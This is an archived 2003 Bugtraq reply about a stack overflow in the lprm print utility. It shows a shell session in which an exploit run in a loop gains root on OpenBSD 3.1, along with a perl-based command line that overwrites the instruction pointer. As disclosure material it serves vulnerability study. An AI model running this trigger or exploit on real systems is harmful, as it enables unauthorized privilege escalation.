[29220] in bugtraq
Re: potential buffer overflow in lprm (fwd)
daemon@ATHENA.MIT.EDU (noir sin)
Fri Mar 7 12:30:37 2003
Date: Wed, 5 Mar 2003 21:58:54 -0800 (PST)
From: noir sin <noir@olympos.org>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0303052151590.1402-100000@juneof44.hoover>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
> A bounds check that was added to lprm in 1996 does its checking too
> late to be effective. Because of the insufficient check, it may
> be possible for a local user to exploit lprm to gain elevated
> privileges. It is not know at this time whether or not the bug is
> actually exploitable.
a real funny stack overflow! if you got a valid printer setup its instant
root!
there is nothing "potential" about this, it is uid=0 ;pPp
bash-2.05a$ id
uid=1000(noir) gid=10(users) groups=10(users)
bash-2.05a$ while `test .`; do ./lprm_ex; done
lp: unknown printer
Segmentation fault
lp: unknown printer
Segmentation fault
lp: unknown printer
Segmentation fault
lp: unknown printer
# id
uid=1000(noir) euid=0(root) gid=10(users) egid=1(daemon) groups=10(users)
# uname -a
OpenBSD kernfu 3.1 conf#0 i386
#
to repro: lprm -Pvalid_printer_name `perl -e 'print "A"x512'` `perl -e
'print "A"x518'`
this shall get you eip = 0x41414141
